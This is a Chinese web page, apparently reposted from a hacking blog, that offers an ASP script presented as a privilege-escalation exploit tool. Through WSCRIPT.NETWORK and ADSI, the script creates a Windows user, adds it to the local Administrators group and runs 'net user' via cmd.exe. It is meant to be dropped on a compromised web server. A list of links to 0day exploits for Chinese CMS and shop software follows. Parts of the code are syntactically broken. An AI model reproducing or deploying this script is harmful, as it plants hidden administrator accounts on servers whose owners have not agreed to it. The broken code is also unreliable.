<head>.network对象脚本权限提升漏洞利用工具</head>
<form action="useradd.asp" method=post>
用户:<input name="username" type="text" value="kevin1986"><br>
密码:<input name="passwd" type="password"><br>
<input type="submit" Value="添 加">
</form>
<%@codepage=936%>
<%on error resume next
if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then
response.write "iP !s n0T RiGHt"
else
if request("username")<>"" then
username=request("username")
passwd=request("passwd")
Response.Expires=0
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.CreateObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.Create("user",username)
od.SetPassword passwd
od.SetInfo
oe.Add oz&"/"&username
if err then
response.write
else
if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登录")>0 then
response.write
else
Response.write "OMG!"&username&
end if
end if
else
response.write "请输入输入用户名"
end if
end if
%>
{本文转自Asboy's bolg博客-原文地址:http://www.asboy.net/post/61.html}
只显示10条记录相关文章
V5-SHOP商城0day (浏览: 9536, 评论: 0)
无忧购物时尚ASP版 oday (浏览: 12076, 评论: 0)
ECSHOP 2.7.X注入漏洞_20100507 (浏览: 16027, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 11762, 评论: 0)
良精所有产品通杀 (浏览: 8918, 评论: 0)
shopwind oday 分析 (浏览: 9081, 评论: 0)
云起企业建站系统通杀oday (浏览: 11190, 评论: 0)
Discuz! 6.x/7.x SODB-2008-13 Exp (浏览: 12199, 评论: 0)
传说中的IE最新0DAY(IE的ActiveX远程执行代码2(不安全的方法)) (浏览: 7460, 评论: 0)